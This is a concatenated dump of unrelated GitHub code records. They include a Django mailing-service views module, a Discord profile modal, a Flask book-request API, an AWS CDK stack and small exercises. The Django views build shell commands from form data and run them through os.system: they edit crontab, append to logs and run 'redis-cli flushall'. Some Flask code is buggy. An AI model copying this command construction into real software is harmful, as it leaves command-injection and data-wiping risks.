mailing.save()\n\n user = self.request.user\n path_project = '/'.join(os.path.abspath('manage.py').split('/')[3:-1])\n cmd = f'cd {path_project} && myvenv/bin/python3 manage.py send_by_cron -u {user.pk} -m {mailing.pk} >> log_cronjobs.txt'''\n os.system(f'''crontab -l | grep -v -F \"{cmd}\" | crontab -''')\n\n if mailing.monthdates:\n start = 'crontab -l | { cat; echo '\n time = f'''\"{mailing.minute} {mailing.hour} {mailing.monthdates} * * '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n return self.get_success_url()\n\n def get_success_url(self):\n return HttpResponseRedirect(self.get_object().get_absolute_url())\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = self.form\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n\n\nclass ConfigMailingDeleteView(DeleteView):\n model = ConfigMailing\n template_name = 'sender/forms/delete_mailing.html'\n success_url = reverse_lazy('sender:profile')\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n\n def form_valid(self, form):\n user = self.request.user\n path_project = '/'.join(os.path.abspath('manage.py').split('/')[3:-1])\n cmd = f'cd {path_project} && myvenv/bin/python3 manage.py send_by_cron -u {user.pk} -m {self.object.pk} >> log_cronjobs.txt'''\n os.system(f'''crontab -l | grep -v -F \"{cmd}\" | crontab -''')\n\n return super().form_valid(form)\n\n\nclass RestartConfigMailingDetailView(DetailView):\n model = ConfigMailing\n template_name = 'sender/restart_mailing.html'\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().user != self.request.user:\n return redirect('sender:access_error')\n\n obj = super().get_object()\n obj.status = ConfigMailing.STATUS_CREATED\n obj.save()\n context = super().get_context_data(object=obj)\n\n return super().render_to_response(context)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n\n\nclass LetterMailingDetailView(DetailView):\n model = LetterMailing\n template_name = 'sender/letter_detail.html'\n pk_url_kwarg = 'letter_pk'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return super().get(request, *args, **kwargs)\n\n if self.get_object().user != user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['mailing'] = ConfigMailing.objects.all().get(id=self.get_object().mailing.pk)\n\n return context\n\n\nclass CreateLetterMailingDetailView(DetailView):\n model = ConfigMailing\n form = LetterCreateForm()\n template_name = 'sender/forms/letter_form.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return super().get(request, *args, **kwargs)\n\n if user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n if user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = self.form\n context['mailing'] = self.object\n\n return context\n\n def post(self, form, pk):\n LetterMailing.objects.create(\n user=self.request.user,\n mailing=self.get_object(),\n title=form.POST['title'],\n content=form.POST['content'],\n position=form.POST['position']\n )\n return HttpResponseRedirect(self.get_object().get_absolute_url())\n\n\nclass LetterMailingUpdateView(UpdateView):\n model = LetterMailing\n form_class = LetterUpdateForm\n template_name = 'sender/forms/letter_form.html'\n pk_url_kwarg = 'letter_pk'\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().mailing.user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse_lazy('sender:mailing_detail', kwargs={'pk': self.get_object().mailing.pk})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['mailing'] = ConfigMailing.objects.all().get(id=self.get_object().mailing.pk)\n context['letter_exist'] = True\n\n return context\n\n\nclass LetterMailingDeleteView(DeleteView):\n model = LetterMailing\n template_name = 'sender/forms/delete_letter.html'\n pk_url_kwarg = 'letter_pk'\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().mailing.user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse_lazy('sender:mailing_detail', kwargs={'pk': self.get_object().mailing.pk})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['mailing'] = ConfigMailing.objects.all().get(id=self.get_object().mailing.pk)\n\n return context\n\n\nclass TryMailingListView(ListView):\n model = TryMailing\n template_name = 'sender/try_list.html'\n success_url = reverse_lazy('sender:trials')\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return super().get(request, *args, **kwargs)\n\n if user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n if user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_queryset(self):\n user = self.request.user\n\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return super().get_queryset().order_by('-date_time_try')\n\n return super().get_queryset().filter(user=self.request.user).order_by('-date_time_try')\n\n\nclass InvalidVerifyTemplateView(TemplateView):\n template_name = 'sender/service/invalid_verify.html'\n\n def get(self, request, *args, **kwargs):\n context = super().get_context_data(**kwargs)\n\n if self.request.user.is_authenticated:\n return redirect_to_main_page(self.request.user)\n\n return self.render_to_response(context)\n\n\nclass UserListModeratingListView(ListView):\n model = User\n template_name = 'sender/user_list_moderating.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(include_static_context())\n\n return context\n\n\nclass UserCommentModeratingUpdateView(DetailView):\n model = User\n template_name = 'sender/forms/user_comment_form.html'\n form = UserCommentForm()\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = self.form\n\n return context\n\n def post(self, form, pk):\n obj = User.objects.all().get(id=pk)\n obj.comment = form.POST['comment']\n obj.save()\n\n return redirect('sender:moderating_users')\n\n\nclass MailingBannedUpdateView(UpdateView):\n model = ConfigMailing\n form_class = ConfigMailingBannedForm\n template_name = 'sender/change_ban_status_mailing.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.view_and_ban_any_mailing'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(include_static_context())\n\n return context\n\n def form_valid(self, form):\n obj = super().get_object()\n\n if form.data['banned'] == ConfigMailing.BANNED_FALSE and obj.banned == ConfigMailing.BANNED_FALSE:\n form.add_error('banned', f'Выберите значение ЗАБЛОКИРОВАТЬ')\n\n return super().render_to_response(self.get_context_data(form=form))\n\n if form.data['banned'] == ConfigMailing.BANNED_TRUE and obj.banned == ConfigMailing.BANNED_TRUE:\n form.add_error('banned', f'Выберите значение РАЗБЛОКИРОВАТЬ')\n\n return super().render_to_response(self.get_context_data(form=form))\n\n if form.data['banned'] == ConfigMailing.BANNED_FALSE:\n obj = form.save()\n reason_ban = form.data['reason_ban']\n\n try:\n send_mail(\n subject='''Ваша рассылка на сайте VDchimp разблокирована''',\n message=f'''Рассылка: '{obj.title}' разблокирована. \\n{reason_ban}. \\nЕсли у Вас есть вопросы, Вы можете написать модератору на почту {self.request.user.email}''',\n from_email=settings.EMAIL_HOST_USER,\n recipient_list=[obj.user.email, ]\n )\n\n except SMTPException as e:\n os.system(f'echo {timezone.now()}, {e} >> send_reason_ban_mailing_errors.txt')\n\n return redirect('sender:send_ban_status_error')\n\n else:\n return redirect('sender:moderating_mailings')\n\n if form.data['banned'] == ConfigMailing.BANNED_TRUE:\n obj = form.save()\n reason_ban = form.data['reason_ban']\n\n try:\n send_mail(\n subject='''Ваша рассылка на сайте VDchimp заблокирована''',\n message=f'''Рассылка: '{obj.title}' заблокирована. \\nПричины бана: {reason_ban}. \\nЕсли у Вас есть вопросы, Вы можете написать модератору на почту {self.request.user.email}''',\n from_email=settings.EMAIL_HOST_USER,\n recipient_list=[obj.user.email, ]\n )\n\n except SMTPException as e:\n os.system(f'echo {timezone.now()}, {e} >> send_reason_ban_mailing_errors.txt')\n\n return redirect('sender:send_ban_status_error')\n\n else:\n return redirect('sender:moderating_mailings')\n\n\nclass UserBannedUpdateView(UpdateView):\n model = User\n form_class = UserBannedForm\n template_name = 'sender/change_ban_status_user.html'\n success_url = reverse_lazy('sender:moderating_users')\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(include_static_context())\n\n return context\n\n def form_valid(self, form):\n obj = super().get_object()\n\n\n if form.data['banned'] == User.BANNED_FALSE and obj.banned == User.BANNED_FALSE:\n form.add_error('banned', f'Выберите значение ЗАБЛОКИРОВАТЬ')\n\n return super().render_to_response(self.get_context_data(form=form))\n\n if form.data['banned'] == User.BANNED_TRUE and obj.banned == User.BANNED_TRUE:\n form.add_error('banned', f'Выберите значение РАЗБЛОКИРОВАТЬ')\n\n return super().render_to_response(self.get_context_data(form=form))\n\n if form.data['banned'] == User.BANNED_FALSE:\n obj = form.save()\n reason_ban = form.data['reason_ban']\n\n try:\n send_mail(\n subject='''Вы разблокированы на сайте VDchimp''',\n message=f'''\\n{reason_ban}. \\nЕсли у Вас есть вопросы, Вы можете написать модератору на почту {self.request.user.email}''',\n from_email=settings.EMAIL_HOST_USER,\n recipient_list=[obj.email,]\n )\n\n except SMTPException as e:\n os.system(f'echo {timezone.now()}, {e} >> send_reason_ban_user_errors.txt')\n\n return redirect('sender:send_ban_status_error')\n\n else:\n return HttpResponseRedirect(self.get_success_url())\n\n if form.data['banned'] == User.BANNED_TRUE:\n obj = form.save()\n reason_ban = form.data['reason_ban']\n\n try:\n send_mail(\n subject='''Вы заблокированы на сайте VDchimp''',\n message=f'''\\nПричины бана: {reason_ban}. \\nЕсли у Вас есть вопросы, Вы можете н��писать модератору на почту {self.request.user.email}''',\n from_email=settings.EMAIL_HOST_USER,\n recipient_list=[obj.email, ]\n )\n\n except SMTPException as e:\n os.system(f'echo {timezone.now()}, {e} >> send_reason_ban_user_errors.txt')\n\n return redirect('sender:send_ban_status_error')\n\n else:\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass PostListContentManagementListView(ListView):\n model = Post\n template_name = 'sender/post_list_content_management.html'\n paginate_by = 12\n ordering = ['-create_at']\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['inactive'] = self.model.STATUS_INACTIVE\n\n return context\n\n\nclass PostListView(ListView):\n model = Post\n template_name = 'sender/post_list.html'\n paginate_by = 12\n ordering = ['-create_at']\n paginate_orphans = 3\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['count_posts'] = self.get_queryset().filter(status=self.model.STATUS_ACTIVE).count()\n context['blog'] = Blog.objects.all().first()\n object_list = cache_blog(Post)\n paginator = Paginator(object_list, 12)\n page_number = self.request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context['page_obj'] = page_obj\n context['paginator'] = paginator\n context['object_list'] = paginator.page(int(str(page_obj).split(' ')[1])).object_list\n\n return context\n\n\n\nclass PostDetailView(DetailView):\n model = Post\n template_name = 'sender/post_detail.html'\n\n def get(self, request, *args, **kwargs):\n super().get(request, *args, **kwargs)\n\n obj = self.get_object()\n context = super().get_context_data(object=obj)\n obj.count_views += 1\n obj.save()\n\n return super().render_to_response(context)\n\n\nclass PostCreateView(CreateView):\n model = Post\n template_name = 'sender/forms/post_form.html'\n form_class = PostForm\n success_url = reverse_lazy('sender:content_management_posts')\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def form_valid(self, form):\n self.object = form.save()\n self.object.user = self.request.user\n self.object.slug = translit.do(self.object.title)\n self.object.change_at = timezone.now()\n self.object.save()\n os.system('redis-cli flushall')\n\n return super().form_valid(form)\n\n\nclass PostUpdateView(UpdateView):\n model = Post\n template_name = 'sender/forms/post_form.html'\n form_class = PostForm\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def form_valid(self, form):\n self.object = form.save()\n self.object.slug = translit.do(self.object.title)\n self.object.change_at = timezone.now()\n self.object.save()\n os.system('redis-cli flushall')\n\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('sender:content_management_posts')\n\n\nclass PostDeleteView(DeleteView):\n model = Post\n template_name = 'sender/forms/delete_post.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse_lazy('sender:content_management_posts')\n\n def form_valid(self, form):\n os.system('redis-cli flushall')\n\n return super().form_valid(form)\n\n\nclass BlogUpdateView(UpdateView):\n model = Blog\n template_name = 'sender/forms/blog_form.html'\n form_class = BlogForm\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_object(self, queryset=None):\n return Blog.objects.first()\n\n def get_success_url(self):\n return reverse_lazy('sender:content_management_posts')\n\n\nclass CustomPasswordChangeView(PasswordChangeView):\n template_name = 'sender/forms/change_password_profile.html'\n model = User\n\n def get_success_url(self):\n return redirect_to_main_page(self.request.user)\n\n\nclass CustomPasswordResetFormView(FormView):\n template_name = 'sender/forms/reset_password_form.html'\n form_class = CustomPasswordResetForm\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if user.is_authenticated:\n return HttpResponseRedirect(redirect_to_main_page(user))\n\n return super().get(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n\n if form.is_valid():\n email = form.cleaned_data.get('email')\n user = User.objects.all().get(email=email)\n new_password = User.objects.make_random_password(length=20)\n user.set_password(new_password)\n user.save()\n\n try:\n custom_send_mail.reset_password(request, email, new_password)\n\n except SMTPException as e:\n os.system(f'echo {timezone.now()}, {e} >> password_reset_errors.txt')\n\n return redirect('sender:some_error')\n\n else:\n return redirect('sender:confirm_reset')\n\n context = {'form': form}\n\n return render(request, self.template_name, context)\n\n\nclass ConfirmResetPasswordTemplateView(TemplateView):\n template_name = 'sender/service/after_reset_password.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if user.is_authenticated and user.has_perm('sender.view_and_ban_any_mailing'):\n return HttpResponseRedirect(redirect_to_main_page(user))\n\n return super().get(request, *args, **kwargs)\n\n\nclass UserProfileUpdateView(UpdateView):\n model = User\n form_class = CustomUserEditForm\n template_name = 'sender/forms/edit_profile.html'\n\n def get(self, request, *args, **kwargs):\n super().get(request, *args, **kwargs)\n\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n return self.render_to_response(self.get_context_data())\n\n def get_object(self, queryset=None):\n return self.request.user\n\n def get_success_url(self):\n return redirect_to_main_page(self.request.user)\n\n def form_valid(self, form):\n self.object = form.save()\n self.object.phone = str(self.object.phone).replace('+', '').replace('(', '').replace(')', '').replace('-', '').replace(' ', '')\n self.object.save()\n\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass HomeDetailView(DetailView):\n model = Home\n template_name = 'sender/home.html'\n\n def get_object(self, queryset=None):\n return Home.objects.all().first()\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['home'] = Home.objects.all().first()\n context['advantage_list'] = AdvantagesHome.objects.all().filter(status=AdvantagesHome.STATUS_ACTIVE)\n context['db_count_users'] = User.objects.all().count()\n context['db_count_all_mailings'] = ConfigMailing.objects.all().count()\n context['db_count_active_mailings'] = ConfigMailing.objects.all().filter(status=ConfigMailing.STATUS_CREATED)\n context['post_list'] = cache_home_posts(Post)\n\n return context\n\n\nclass ContactsFormView(FormView):\n template_name = 'sender/contacts.html'\n form_class = FeedbackForm\n success_url = reverse_lazy('catalog:after_feedback')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['contacts'] = Contacts.objects.all().get(id=1)\n\n return context\n\n def form_valid(self, form):\n recipients = [x.email for x in User.objects.all().filter(groups__name='Менеджеры')]\n custom_send_mail.feedback(form.data['name'], form.data['email'], form.data['message'], recipients)\n\n return super().form_valid(form)\n\n\ndef error_404(request, exception):\n context = {}\n context['page_title'] = '404'\n response = render(request, 'sender/service/page_404.html', context=context)\n response.status_code = 404\n\n return response\n\n\n","repo_name":"VDexpert/vdchimp","sub_path":"sender/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":44817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74747797584","text":"import discord\nfrom model import profile\nimport asyncio\n\n\nclass Creatprofile(discord.ui.Modal, title=\"profile\"):\n name = discord.ui.TextInput(\n label=\"Name\",\n placeholder=\"Your name here...\",\n )\n\n location = discord.ui.TextInput(\n label=\"Location\",\n style=discord.TextStyle.short,\n placeholder=\"Where are you from\",\n required=False,\n max_length=300,\n )\n\n looking_for = discord.ui.TextInput(\n label=\"looking for\",\n placeholder=\"What are you looking for? Type None if you don't want to share!\",\n )\n\n hobbies = discord.ui.TextInput(\n label=\"hobbies\",\n placeholder=\"What are your hobbies?\",\n )\n\n \n age = discord.ui.TextInput(\n label=\"Age\",\n placeholder=\"Input your age (number only)\",\n )\n \n\n biography = discord.ui.TextInput(\n label=\"biography\",\n placeholder=\"Please write a biography, under 200 characters!\",\n )\n\n async def on_submit(self, interaction: discord.Interaction):\n profile.profile_data(\n str(interaction.user),\n str(interaction.user.id),\n self.name.value,\n self.location.value,\n self.looking_for.value,\n self.hobbies.value,\n self.age.value,\n self.biography.value,\n )\n\n await interaction.response.send_message(f\"profile created\", ephemeral=True)\n await asyncio.sleep(20)\n await interaction.delete_original_response()\n\n async def on_error(\n self, interaction: discord.Interaction, error: Exception\n ) -> None:\n await interaction.response.send_message(\n \"Oops! Something went wrong.\", ephemeral=True\n )\n","repo_name":"daveads/discord-profile-bot","sub_path":"view/modal/profile_modal.py","file_name":"profile_modal.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10847582181","text":"class cgraph(object):\n def __init__(self,n,m,graph):\n self.n = n\n self.m = m\n self.graph = graph\n self.visited = [[False for j in i] for i in graph]\n def is_safe(self,i,j):\n return(i>=0 and i=0 and j', methods=['GET'])\ndef get_record_by_id(_id):\n \"\"\"Get book request details by it's id\n @param _id: the id\n @return: 200: a BOOK_REQUESTS as a flask/response object \\\n with application/json mimetype.\n @raise 404: if book request not found\n \"\"\"\n db = pymysql.connect(**config)\n cursor = db.cursor()\n sql = \"SELECT * FROM book_info;\"\n try:\n cursor.execute(sql)\n results = cursor.fetchall()\n \n BOOK_REQUESTS = results\n db.close()\n\n finally:\n if _id not in BOOK_REQUESTS:\n abort(404)\n return jsonify(BOOK_REQUESTS[_id])\n\n\n@REQUEST_API.route('/request', methods=['POST'])\ndef create_record():\n \"\"\"Create a book request record\n @param email: post : the requesters email address\n @param title: post : the title of the book requested\n @return: 201: a new_uuid as a flask/response object \\\n with application/json mimetype.\n @raise 400: misunderstood request\n \"\"\"\n if not request.get_json():\n abort(400)\n data = request.get_json(force=True)\n\n if not data.get('email'):\n abort(400)\n if not validate_email(data['email']):\n abort(400)\n if not data.get('title'):\n abort(400)\n\n new_uuid = str(uuid.uuid4())\n book_request = {\n 'title': data['title'],\n 'email': data['email'],\n 'timestamp': datetime.now().timestamp()\n }\n BOOK_REQUESTS[new_uuid] = book_request\n # save the new book to jason file, further jobs: need to rewrite the file under the formatal style for read it easily. -wayne W\n fo = open(\"./routes/data1.json\", \"w\")\n fo.write( str(json.dumps(json_data)) )\n fo.close()\n # HTTP 201 Created\n return jsonify({\"id\": new_uuid}), 201\n \n\n@REQUEST_API.route('/request/', methods=['PUT'])\ndef edit_record(_id):\n \"\"\"Edit a book request record\n @param email: post : the requesters email address\n @param title: post : the title of the book requested\n @return: 200: a booke_request as a flask/response object \\\n with application/json mimetype.\n @raise 400: misunderstood request\n \"\"\"\n if _id not in BOOK_REQUESTS:\n abort(404)\n\n if not request.get_json():\n abort(400)\n data = request.get_json(force=True)\n\n if not data.get('email'):\n abort(400)\n if not validate_email(data['email']):\n abort(400)\n if not data.get('title'):\n abort(400)\n\n book_request = {\n 'title': data['title'],\n 'email': data['email'],\n 'timestamp': datetime.now().timestamp()\n }\n\n BOOK_REQUESTS[_id] = book_request\n # save the new book to jason file, further jobs: need to rewrite the file under the formatal style for read it easily. -wayne W\n fo = open(\"./routes/data1.json\", \"w\")\n # json.dump(str(jason_data),fo)\n fo.write( str(json.dumps(json_data)) )\n fo.close()\n return jsonify(BOOK_REQUESTS[_id]), 200\n\n\n@REQUEST_API.route('/request/', methods=['DELETE'])\ndef delete_record(_id):\n \"\"\"Delete a book request record\n @param id: the id\n @return: 204: an empty payload.\n @raise 404: if book request not found\n \"\"\"\n if _id not in BOOK_REQUESTS:\n abort(404)\n\n del BOOK_REQUESTS[_id]\n # save the new book to jason file, further jobs: need to rewrite the file under the formatal style for read it easily. -wayne W\n fo = open(\"./routes/data1.json\", \"w\")\n # json.dump(str(jason_data),fo)\n fo.write( str(json.dumps(json_data)) )\n fo.close()\n return '', 204\n","repo_name":"waynexw/VOA_LOAD","sub_path":"Python/request_api-backup0721.py","file_name":"request_api-backup0721.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26050195272","text":"from aws_cdk import (\n Duration,\n Stack,\n aws_lambda as _lambda,\n aws_sqs as sqs,\n aws_apigateway as apigw,\n aws_stepfunctions as sfn,\n aws_stepfunctions_tasks as tasks,\n aws_iam as iam,\n aws_s3 as s3,\n aws_sns as sns,\n aws_s3_notifications as s3n,\n aws_dynamodb as dynamodb,\n aws_logs as logs,\n aws_sns_subscriptions as subscriptions,\n aws_lambda_event_sources as lambda_event_sources,\n aws_lambda_python_alpha as lambda_python,\n)\nimport aws_cdk as cdk\nfrom constructs import Construct\nfrom deploy.api.infrastructure.chaliceapp import ChaliceApp\n\n\nclass BrokerStack(Stack):\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n self.queues = []\n\n self.trigger_topic = sns.Topic(self, \"TriggerTopic\")\n\n self.bucket = s3.Bucket(\n self,\n \"InputBucket\",\n enforce_ssl=True,\n removal_policy=cdk.RemovalPolicy.DESTROY,\n )\n\n self.table = dynamodb.Table(\n self,\n \"WorkflowTable\",\n partition_key=dynamodb.Attribute(\n # submission_id?\n name=\"user_id#workflow_id\",\n type=dynamodb.AttributeType.STRING,\n ),\n sort_key=dynamodb.Attribute(\n name=\"workflow#id\", type=dynamodb.AttributeType.STRING\n ),\n time_to_live_attribute=\"ttl\",\n replication_regions=[],\n billing_mode=dynamodb.BillingMode.PROVISIONED,\n removal_policy=cdk.RemovalPolicy.DESTROY,\n )\n\n self.table.auto_scale_write_capacity(\n min_capacity=1, max_capacity=2\n ).scale_on_utilization(target_utilization_percent=75)\n\n input_validator_lambda = lambda_python.PythonFunction(\n self,\n \"InputValidatorLambda\",\n entry=\"lambdas/\",\n runtime=_lambda.Runtime.PYTHON_3_9,\n handler=\"handler\",\n index=\"validator.py\",\n environment={\n \"WORKFLOW_TABLE\": self.table.table_name,\n \"LOG_LEVEL\": \"INFO\",\n },\n log_retention=logs.RetentionDays.THREE_DAYS,\n )\n\n self.table.grant_write_data(input_validator_lambda)\n\n self.bucket.add_event_notification(\n s3.EventType.OBJECT_CREATED,\n s3n.LambdaDestination(input_validator_lambda)\n # could add filters here\n )\n self.bucket.grant_read(input_validator_lambda)\n\n publish_to_sns_lambda = _lambda.Function(\n self,\n \"PublishToSnsLambda\",\n runtime=_lambda.Runtime.PYTHON_3_9,\n code=_lambda.Code.from_asset(\"lambdas\"),\n handler=\"publisher.handler\",\n environment={\n \"SNS_TOPIC_ARN\": self.trigger_topic.topic_arn,\n \"LOG_LEVEL\": \"INFO\",\n },\n log_retention=logs.RetentionDays.THREE_DAYS,\n )\n publish_to_sns_lambda.add_event_source(\n lambda_event_sources.DynamoEventSource(\n self.table,\n starting_position=_lambda.StartingPosition.TRIM_HORIZON,\n batch_size=5,\n bisect_batch_on_error=True,\n filters=[\n _lambda.FilterCriteria.filter(\n {\n \"eventName\": [\"MODIFY\"],\n \"dynamodb\": {\n \"Keys\": {\"workflow#id\": {\"S\": [\"submission#0\"]}},\n \"OldImage\": {\n \"is_valid\": {\n \"BOOL\": _lambda.FilterRule.not_exists()\n }\n },\n \"NewImage\": {\"is_valid\": {\"BOOL\": [True]}},\n },\n }\n )\n ],\n # on_failure=SqsDlq(dead_letter_queue),\n )\n )\n\n self.trigger_topic.grant_publish(publish_to_sns_lambda)\n\n self.api = ChaliceApp(\n self,\n broker_table=self.table,\n broker_bucket=self.bucket,\n broker_queues=self.queues,\n )\n\n def get_queue(self, workflow_name: str):\n queue = sqs.Queue(self, f\"{workflow_name}Queue\")\n self.queues.append(queue)\n\n self.trigger_topic.add_subscription(subscriptions.SqsSubscription(queue))\n return queue\n\n def register_workflows(self):\n pass\n","repo_name":"noxjonas/workflow-broker","sub_path":"deploy/app_stack.py","file_name":"app_stack.py","file_ext":"py","file_size_in_byte":4584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36714116465","text":"#!/bin/python3\n\n#\n# Url: https://www.hackerrank.com/challenges/swap-case/problem\n#\n# Title: sWAP cASE\n#\n# Arquivo de Teste\n#\n\ndef swap_case(texto):\n saida = ''\n for caracter_atual in texto:\n if caracter_atual.islower():\n saida += caracter_atual.upper()\n elif caracter_atual.isupper():\n saida += caracter_atual.lower()\n else:\n saida += caracter_atual\n return saida\n\n\n\nif __name__ == '__main__':\n entrada1 = 'HackerRank.com presents \"Pythonist 2\".'\n esperado1 = 'hACKERrANK.COM PRESENTS \"pYTHONIST 2\".'\n teste1 = swap_case(entrada1)\n if esperado1 != teste1:\n print('Valor errado: ', teste1)\n else:\n print('Valor correto: ', teste1)\n","repo_name":"LuanaSchlei/HackerRank_Python","sub_path":"swap-case/swap-case-teste.py","file_name":"swap-case-teste.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74832630226","text":"n = 5\narr1 = [9, 20, 28, 18, 11]\narr2 = [30, 1, 21, 17, 28]\n# result = [\"#####\", \"# # #\", \"### #\", \"# ##\", \"#####\"]\n\n\n# def solution(n, arr1, arr2):\n# answer = []\n# map1 = []\n# map2 = []\n# for num in arr1:\n# map1.append(num_to_bin(n, num))\n# for num in arr2:\n# map2.append(num_to_bin(n, num))\n# for i in range(n):\n# row = \"\"\n# for j in range(n):\n# if map1[i][j] == \"1\" or map2[i][j] == \"1\":\n# row += \"#\"\n# else:\n# row += \" \"\n# answer.append(row)\n# print(answer)\n# return answer\n\n\n# def num_to_bin(n, num):\n# value = ''\n# while num > 1:\n# num, mod = divmod(num, 2)\n# value = str(mod) + value\n# value = str(num) + value\n# while len(value) < n:\n# value = \"0\" + value\n# return value\n\n\n# print(solution(n, arr1, arr2))\n# print(result)\n\n\n########################미친놈들풀이########################\n\ndef solution(n, arr1, arr2):\n answer = []\n for i, j in zip(arr1, arr2):\n row = str(bin(i | j)[2:])\n row = row.rjust(n, '0')\n row = row.replace('1', '#')\n row = row.replace('0', ' ')\n answer.append(row)\n return answer\n\n\nprint(solution(n, arr1, 